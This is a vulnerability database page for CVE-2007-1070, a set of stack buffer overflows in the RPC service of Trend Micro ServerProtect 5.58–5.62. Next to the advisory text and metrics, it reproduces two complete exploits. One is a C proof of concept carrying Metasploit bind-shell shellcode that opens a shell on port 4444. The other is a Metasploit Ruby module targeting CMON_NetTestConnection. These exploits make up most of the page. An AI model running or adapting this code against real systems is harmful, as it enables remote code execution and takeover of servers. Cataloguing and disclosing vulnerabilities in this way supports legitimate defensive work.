CVE-2007-1070: Details

CVE-2007-1070

93.29%V3
Network
2007-02-21
10h00 +00:00
2018-10-16
12h57 +00:00

CVE Description

Multiple stack-based buffer overflows in Trend Micro ServerProtect for Windows and EMC 5.58, and for Network Appliance Filer 5.61 and 5.62, allow remote attackers to execute arbitrary code via crafted RPC requests to TmRpcSrv.dll that trigger overflows when calling the (1) CMON_NetTestConnection, (2) CMON_ActiveUpdate, and (3) CMON_ActiveRollback functions in (a) StCommon.dll, and (4) ENG_SetRealTimeScanConfigInfo and (5) ENG_SendEMail functions in (b) eng50.dll.

CVE Information

Metrics

Metric   Score   Severity   CVSS Vector                   Source
V2       10                 AV:N/AC:L/Au:N/C:C/I:C/A:C    nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the probability that a vulnerability will be exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that the vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of all other CVEs. The percentile therefore serves to compare one CVE's EPSS score against the others.

Exploit Information

Exploit Database EDB-ID: 4367

Publication date: 2007-09-05 22h00 +00:00
Author: devcode
EDB Verified: Yes

/*
 * Copyright (c) 2007 devcode
 *
 *
 *          ^^ D E V C O D E ^^
 *
 * Trend Micro ServerProtect eng50.dll Stack Overflow
 * [CVE-2007-1070]
 *
 *
 * Description:
 * A boundary error within a function in eng50.dll can be
 * exploited to cause a stack-based buffer overflow via a
 * specially crafted RPC request to the SpntSvc.exe service.
 *
 * Hotfix/Patch:
 * http://www.trendmicro.com/download/product.asp?productid=17
 *
 * Vulnerable systems:
 * ServerProtect for Windows 5.58
 * ServerProtect for EMC 5.58
 * ServerProtect for Network Appliance Filer 5.61
 * ServerProtect for Network Appliance Filer 5.62
 *
 * Tested on:
 * Microsoft Windows 2000 SP4
 *
 * This is a PoC and was created for educational purposes only. The
 * author is not held responsible if this PoC does not work or is
 * used for any other purposes than the one stated above.
 *
 * Notes:
 * <3 TippingPoint for technical details. Had this made few days after
 * disclosure (few months back), was rlsd on r1918 about a week ago
 * and I notice trend micro exploit reports on isc.sans.org. DIDNT KNOW
 * I WAS THIS HOT DAYUM
 *
 */

#include <iostream>
#include <windows.h>

#pragma comment( lib, "ws2_32.lib" )

/* 25288888-bd5b-11d1-9d53-0080c83a5c2c v1.0 */
unsigned char uszDceBind[] =
    "\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00"
    "\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
    "\x88\x88\x28\x25\x5B\xBD\xD1\x11\x9D\x53\x00\x80\xC8\x3A\x5C\x2C"
    "\x01\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00"
    "\x2B\x10\x48\x60\x02\x00\x00\x00";

/* rpc_opnum_0 */
unsigned char uszDceCall[] =
    "\x05\x00\x00\x83\x10\x00\x00\x00\x08\x08\x00\x00\x01\x00\x00\x00"
    "\xE0\x07\x00\x00\x00\x00\x00\x00\x88\x88\x28\x25\x5B\xBD\xD1\x11"
    "\x9D\x53\x00\x80\xC8\x3A\x5C\x2C\x04\x00\x03\x00\xD0\x07\x00\x00";

/* win32_bind - EXITFUNC=thread LPORT=4444 Size=342 Encoder=PexFnstenvMov http://metasploit.com */
unsigned char uszShellcode[] =
    "\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x76\xd2\xab"
    "\x1f\x83\xeb\xfc\xe2\xf4\x8a\xb8\x40\x52\x9e\x2b\x54\xe0\x89\xb2"
    "\x20\x73\x52\xf6\x20\x5a\x4a\x59\xd7\x1a\x0e\xd3\x44\x94\x39\xca"
    "\x20\x40\x56\xd3\x40\x56\xfd\xe6\x20\x1e\x98\xe3\x6b\x86\xda\x56"
    "\x6b\x6b\x71\x13\x61\x12\x77\x10\x40\xeb\x4d\x86\x8f\x37\x03\x37"
    "\x20\x40\x52\xd3\x40\x79\xfd\xde\xe0\x94\x29\xce\xaa\xf4\x75\xfe"
    "\x20\x96\x1a\xf6\xb7\x7e\xb5\xe3\x70\x7b\xfd\x91\x9b\x94\x36\xde"
    "\x20\x6f\x6a\x7f\x20\x5f\x7e\x8c\xc3\x91\x38\xdc\x47\x4f\x89\x04"
    "\xcd\x4c\x10\xba\x98\x2d\x1e\xa5\xd8\x2d\x29\x86\x54\xcf\x1e\x19"
    "\x46\xe3\x4d\x82\x54\xc9\x29\x5b\x4e\x79\xf7\x3f\xa3\x1d\x23\xb8"
    "\xa9\xe0\xa6\xba\x72\x16\x83\x7f\xfc\xe0\xa0\x81\xf8\x4c\x25\x81"
    "\xe8\x4c\x35\x81\x54\xcf\x10\xba\xba\x43\x10\x81\x22\xfe\xe3\xba"
    "\x0f\x05\x06\x15\xfc\xe0\xa0\xb8\xbb\x4e\x23\x2d\x7b\x77\xd2\x7f"
    "\x85\xf6\x21\x2d\x7d\x4c\x23\x2d\x7b\x77\x93\x9b\x2d\x56\x21\x2d"
    "\x7d\x4f\x22\x86\xfe\xe0\xa6\x41\xc3\xf8\x0f\x14\xd2\x48\x89\x04"
    "\xfe\xe0\xa6\xb4\xc1\x7b\x10\xba\xc8\x72\xff\x37\xc1\x4f\x2f\xfb"
    "\x67\x96\x91\xb8\xef\x96\x94\xe3\x6b\xec\xdc\x2c\xe9\x32\x88\x90"
    "\x87\x8c\xfb\xa8\x93\xb4\xdd\x79\xc3\x6d\x88\x61\xbd\xe0\x03\x96"
    "\x54\xc9\x2d\x85\xf9\x4e\x27\x83\xc1\x1e\x27\x83\xfe\x4e\x89\x02"
    "\xc3\xb2\xaf\xd7\x65\x4c\x89\x04\xc1\xe0\x89\xe5\x54\xcf\xfd\x85"
    "\x57\x9c\xb2\xb6\x54\xc9\x24\x2d\x7b\x77\x99\x1c\x4b\x7f\x25\x2d"
    "\x7d\xe0\xa6\xd2\xab\x1f";

void usage( )
{
    printf("\n\t\tTrend Micro ServerProtect Stack Overflow\n"
           "\t\t\t(c) 2007 devcode\n\n"
           "usage: tmicro.exe <ip> <port>\n");
}

int main( int argc, char **argv )
{
    WSADATA wsaData;
    SOCKET sConnect;
    SOCKADDR_IN sockAddr;
    char szRecvBuf[512];
    unsigned char uszPacket[2056];
    int nRet;

    if ( argc < 3 ) {
        usage( );
        return -1;
    }

    if ( WSAStartup( MAKEWORD( 2, 0 ), &wsaData ) != NO_ERROR ) {
        printf("[-] Unable to startup winsock\n");
        return -1;
    }

    sConnect = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
    if ( sConnect == INVALID_SOCKET ) {
        printf("[-] Invalid socket\n");
        return -1;
    }

    sockAddr.sin_family = AF_INET;
    sockAddr.sin_addr.s_addr = inet_addr( argv[1] );
    sockAddr.sin_port = htons( atoi( argv[2] ) );

    printf("[+] Connecting to %s:%s\n", argv[1], argv[2] );
    nRet = connect( sConnect, (SOCKADDR *)&sockAddr, sizeof( sockAddr ) );
    if ( nRet == SOCKET_ERROR ) {
        printf("[-] Cannot connect to server\n");
        closesocket( sConnect );
        return -1;
    }

    printf("[+] Sending DCE Bind packet...\n");
    nRet = send( sConnect, (const char *)uszDceBind, sizeof( uszDceBind ) - 1, 0 );
    if ( nRet == SOCKET_ERROR ) {
        printf("[-] Cannot send\n");
        closesocket( sConnect );
        return -1;
    }

    nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );
    if ( nRet <= 0 ) {
        printf("[-] Recv failed\n");
        closesocket( sConnect );
        return -1;
    }

    memset( uszPacket, 0x41, sizeof( uszPacket ) );
    memcpy( uszPacket, (const char *)uszDceCall, sizeof( uszDceCall ) );
    memcpy( uszPacket+48, uszShellcode, sizeof( uszShellcode ) - 1 );

    /* call ebx, 0x6574131C, TmRpcSrv.dll */
    /* jmp ebx, 0x7C4E4A66, kernel32.dll */
    memcpy( uszPacket + 1198, "\x1C\x13\x74\x65", 4 );
    memcpy( uszPacket + 2048, "\xD0\x07\x00\x00\xD0\x07\x00\x00", 8 );

    printf("[+] Sending DCE Request packet...\n");
    nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 );
    if ( nRet == SOCKET_ERROR ) {
        printf("[-] Cannot send\n");
        closesocket( sConnect );
        return -1;
    }

    printf("[+] Check shell on port 4444 :)\n");
    nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );

    closesocket( sConnect );
    return 0;
}

// milw0rm.com [2007-09-06]
Exploit Database EDB-ID: 16827

Publication date: 2010-04-29 22h00 +00:00
Author: Metasploit
EDB Verified: Yes

##
# $Id: trendmicro_serverprotect.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::DCERPC

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Trend Micro ServerProtect 5.58 Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060.
        By sending a specially crafted RPC request, an attacker could overflow the
        buffer and execute arbitrary code.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9179 $',
      'References'     =>
        [
          ['CVE', '2007-1070'],
          ['OSVDB', '33042'],
          ['BID', '22639'],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'          => 800,
          'BadChars'       => "\x00",
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Trend Micro ServerProtect 5.58 Build 1060', { 'Ret' => 0x6563124c } ], # CALL EBX - StCommon.dll
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Feb 20 2007'))

    register_options(
      [
        Opt::RPORT(5168)
      ], self.class)
  end

  def exploit
    connect

    handle = dcerpc_handle('25288888-bd5b-11d1-9d53-0080c83a5c2c', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
    print_status("Binding to #{handle} ...")
    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")

    filler = payload.encoded + rand_text_english(1600 - payload.encoded.length) + [target.ret].pack('V')
    len = filler.length

    # CMON_NetTestConnection
    sploit = NDR.long(0x000a0017) + NDR.long(len) + filler + NDR.long(0)

    print_status("Trying target #{target.name}...")

    begin
      dcerpc_call(0, sploit)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
    end

    handler
    disconnect
  end

end

Products Mentioned

Configuration 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2003_server >> Version r2

Microsoft>>Windows_2003_server >> Version sp2

Microsoft>>Windows_nt >> Version *

Microsoft>>Windows_vista >> Version *

Microsoft>>Windows_xp >> Version *

Trend_micro>>Serverprotect >> Version 5.58

Configuration 0

Trend_micro>>Serverprotect >> Version 5.58

Trend_micro>>Serverprotect >> Version 5.61

Trend_micro>>Serverprotect >> Version 5.62

References

http://www.kb.cert.org/vuls/id/466609
Tags: third-party-advisory, x_refsource_CERT-VN
http://secunia.com/advisories/24243
Tags: third-party-advisory, x_refsource_SECUNIA
http://osvdb.org/33042
Tags: vdb-entry, x_refsource_OSVDB
http://www.kb.cert.org/vuls/id/630025
Tags: third-party-advisory, x_refsource_CERT-VN
http://www.kb.cert.org/vuls/id/730433
Tags: third-party-advisory, x_refsource_CERT-VN
http://www.securityfocus.com/bid/22639
Tags: vdb-entry, x_refsource_BID
http://www.vupen.com/english/advisories/2007/0670
Tags: vdb-entry, x_refsource_VUPEN
http://www.kb.cert.org/vuls/id/349393
Tags: third-party-advisory, x_refsource_CERT-VN
http://www.securitytracker.com/id?1017676
Tags: vdb-entry, x_refsource_SECTRACK